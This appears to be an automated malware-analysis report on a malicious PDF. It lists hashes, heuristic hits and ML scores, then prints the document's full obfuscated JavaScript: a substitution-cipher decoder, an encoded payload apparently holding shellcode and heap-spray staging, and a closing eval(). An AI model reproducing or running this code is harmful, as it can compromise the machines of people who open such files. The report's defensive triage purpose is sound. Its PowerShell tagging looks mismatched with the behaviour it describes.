Malicious PDF — malware analysis report

Static analysis result for SHA-256 2c8a3735598489fe…

MALICIOUS

PDF

2.7 KB Created: 2008-12-17 23:30:58 UTC First seen: 2013-06-25
MD5: 6c3ce9c641412493417d3dab6295d3ed SHA-1: 9c6258cf8de91c9ff2d668b9cc56ee84bead24fe SHA-256: 2c8a3735598489fe4d9f036ab7971119c18437c00eea6d87b78bf9759c5b2b3f
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating and executing arbitrary code; the extracted script preview below ends by passing a string that is rebuilt at runtime through a character-substitution routine to eval(), so the script's real behavior is only visible once that string is decoded. The embedded JavaScript is likely responsible for downloading and executing a second-stage payload, contributing to the suspicious verdict. No specific malware family could be confidently identified.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function g6VaWrFSv3f8VnUWLgiN(g6VaWrFSv3f8VnUWLgiN,ram4LLyk7qCemX49EAR0) { return g6VaWrFSv3f8VnUWLgiN.substr(ram4LLyk7qCemX49EAR0, 1); }function gu4vTZ06skKECKX4GS4X(Vczep8f0G9TnuNYDmOAV) {var zKa1VywbGrybJo5zmbqt = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");var b9WLNvO0APLzamrvaeMg = new String("aA)2kDvhB8rzJ.1TpybdctfSQoMH <}xUYP(9EL,0Wmsl4KFR7CVOnq{NjI5XweGgZ>iu36");for(LB8Up3KSV0CwzZ7DKM3K=0;LB8Up3KSV0CwzZ7DKM3K<zKa1VywbGrybJo5zmbqt.length;LB8Up3KS …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0xB5 3793 bytes
SHA-256: 755953f79d91a9ff709d7281b4d11fea39b448ad3b7dc8618691e382ea40f8d1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 25 of 41 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function g6VaWrFSv3f8VnUWLgiN(g6VaWrFSv3f8VnUWLgiN,ram4LLyk7qCemX49EAR0) { return g6VaWrFSv3f8VnUWLgiN.substr(ram4LLyk7qCemX49EAR0, 1); }function gu4vTZ06skKECKX4GS4X(Vczep8f0G9TnuNYDmOAV) {var zKa1VywbGrybJo5zmbqt = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");var b9WLNvO0APLzamrvaeMg = new String("aA)2kDvhB8rzJ.1TpybdctfSQoMH <}xUYP(9EL,0Wmsl4KFR7CVOnq{NjI5XweGgZ>iu36");for(LB8Up3KSV0CwzZ7DKM3K=0;LB8Up3KSV0CwzZ7DKM3K<zKa1VywbGrybJo5zmbqt.length;LB8Up3KSV0CwzZ7DKM3K++) {if(Vczep8f0G9TnuNYDmOAV == g6VaWrFSv3f8VnUWLgiN(b9WLNvO0APLzamrvaeMg, LB8Up3KSV0CwzZ7DKM3K)) {return g6VaWrFSv3f8VnUWLgiN(zKa1VywbGrybJo5zmbqt, LB8Up3KSV0CwzZ7DKM3K);}}return Vczep8f0G9TnuNYDmOAV;}var AwzPaKllqJzYjcTunHVl = new String;var xYGavAa0Brr5egK4qwgX = new String("N(Ov(ev=vR,jv8OO(5)2;0{REqs7Rv0e)NeBvNG2kjmsK,v)NehK,RWqm*GaNG2kNev+=vNe;DNev=vNehn{9nqOsRW)wBNG/G2;O,q{ORvNe;D0{REqs7Rv0G)2kN(Ovnev=v{R,nE(C,)\"%{>g>w%{>G>e%{>u>i%{6E>>%{ww,3%{wwww%{>Lww%{,L3g%{gewL%{iZEw%{Zwwg%{u3gw%{39wE%{wEZw%{uw39%{(LeE%{Zw39%{,9w3%{39w6%{gZZw%{Zw3L%{39uE%{gEZw%{>u>i%{>,9,%{wwwe%{weww%{90,,%{weZ,%{wwww%{,0we%{Li,3%{wwwe%{>0ww%{36>,%{3e,(%{>,EG%{wwwe%{>Gww%{3wi3%{wwww%{00ww%{Z,6>%{wwwe%{36ww%{3e,(%{>,EG%{wwwe%{geww%{we0i%{3(EG%{g>6E%{wGig%{wwww%{093w%{uZww%{33wi%{gGeE%{,9Zi%{Ei,,%{gGwZ%{36ww%{3e,(%{Z>EG%{wwwG%{>Gww%{6>00%{we>G%{wwww%{,(36%{EG3e%{wG>w%{wwww%{>w>G%{6>00%{we>i%{wwww%{wwi(%{wwi(%{,(36%{EG3e%{we>,%{wwww%{36>G%{3e,(%{u3EG%{wwwG%{>Gww%{wwi(%{Lw00%{w>i(%{,(36%{EG3e%{we>,%{wwww%{00>G%{>(6>%{wwwe%{36ww%{3e,(%{>,EG%{wwwe%{>Gww%{3wi3%{wwww%{00ww%{Z,6>%{wwwe%{36ww%{3e,(%{>,EG%{wwwe%{geww%{we0i%{3(EG%{g>6E%{wGi,%{wwww%{093w%{uZww%{33wi%{gGeE%{,9Zi%{Ei,,%{gGwZ%{36ww%{3e,(%{Z>EG%{wwwG%{>Gww%{6>00%{we>G%{wwww%{,(36%{EG3e%{wG>w%{wwww%{>w>G%{6>00%{we>i%{wwww%{wwi(%{wwi(%{,(36%{EG3e%{we>,%{wwww%{36>G%{3e,(%{(gEG%{wwwG%{>Gww%{wwi(%{Lw00%{w>i(%{,(36%{EG3e%{we>,%{wwww%{00>G%{>(6>%{wwwe%{6Lww%{>0>L%{>(>,%{>9>6%{Eg>3%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{i>Zu%{>ZuZ%{
iLi>%{>wuw%{uZie%{Zei3%{ZEww%{iei0%{ZEiZ%{iGi6%{ieuG%{u6uG%{wwZe%{i>Zu%{>wuZ%{i0uG%{Zeig%{iZiZ%{i>uG%{ugug%{>uww%{i,i6%{u3Z>%{igi>%{99ww%{0G36%{0u36%{Ewgw%{u>(,%{G60L%{360u%{ge06%{9,Ew%{wwgE%{wwww%{9>wg%{wGe9%{wwww%{(Lii%{3>wg%{wGe9%{wwww%{uw39%{3gu3%{eEEi%{9>wg%{wGe9%{wwww%{9L3L%{wGe0%{wwww%{wg(L%{e93>%{wwwG%{(9ww%{wg(L%{e93>%{wwwG%{>www%{(L(9%{3>wg%{wGe9%{wwww%{>,(9%{L9ge%{>i(L%{3>wg%{wGe9%{wwww%{Ei36%{Lu36%{0E>e%{(i0g%{uZ>6%{>,wZ%{,9Zg%{>,,6%{Le6g%{wg,w%{Gu3>%{wwwG%{geww%{6i0i%{(Lii%{,wEe%{wgwG%{e03>%{wwwG%{36ww%{(LEi%{3>wg%{wGe9%{wwww%{,9Eg%{wwew%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{36ww%{e93>%{wwwG%{>iww%{,3>u%{00>3%{0000%{>,>0%{we(9%{3wE,%{99g,%{wGuZ%{,L,9%{>>Eg%{ZE>G%{Z0ZL%{G,Z,%{ZEZZ%{wwZE%{>G>>%{ZZZE%{uui0%{iEi,%{iei0%{>ZiZ%{Zii0%{iEi6%{Zei>%{uwww%{iiiZ%{uwu>%{G,iZ%{u3i>%{wwi>%{uGig%{ugie%{G,i3%{i3uw%{wwuw%{uZi3%{uwuZ%{G0g(%{uuG0%{uuuu%{iEG,%{i9u>%{g>ug%{igG,%{G0i,%{i,u>%{uei6%{i>u>%{iEG0%{iei0%{G,iZ%{i3uw%{wwuw%{6www\"2;N(OvNgv=vwIwEwEwEwE;N(OvNZv=vwIZwwwww;N(OvN>v=vnehK,RWqmv*vG;N(OvNGv=vNZv-v)N>+wIg32;N(OvNev=v{R,nE(C,)\"%{6w6w%{6w6w\"2;Nev=v0e)NeBvNG2;N(OvNiv=v)Ngv-vwIZwwwww2/NZ;07Ov)N(OvNu=w;NuaNi;Nu++2k(e[Nu]v=vNev+vne;DD0{REqs7Rv0Z)2kN(OvN3v=v(CChNs,j,O},Ons7Rhq7HqOsRW)2;N3v=N3hO,CK(E,)/\\J/WB\'\'2;N(OvN6v=vR,jv8OO(5)N3hEm(O8q)w2BN3hEm(O8q)e2BN3hEm(O8q)G22;s0v))N6[w]v==v3v&&v))N6[e]v==vev&&vN6[G]vavG2v||vN6[e]vave22v||v)N6[w]v==vuv&&vN6[e]vave2v||v)N6[w]vavu22vk0G)2;N(Ovjev=v{R,nE(C,)\"%{wEwE%{wEwE\"2;jmsK,)jehK,RWqmvavZZ6>G2vjev+=vje;qmsnhE7KK(9Hq7O,v=vz7KK(9hE7KK,Eq.F(sKyR07)kn{9l:v\"\"BFnW:vjeD2;DD0Z)2;");for(AWwfyFQcNmDBAJbwK1mL=0;AWwfyFQcNmDBAJbwK1mL<xYGavAa0Brr5egK4qwgX.length;AWwfyFQcNmDBAJbwK1mL++)AwzPaKllqJzYjcTunHVl += gu4vTZ06skKECKX4GS4X(g6VaWrFSv3f8VnUWLgiN(xYGavAa0Brr5egK4qwgX,AWwfyFQcNmDBAJbwK1mL));eval(AwzPaKllqJzYjcTunHVl);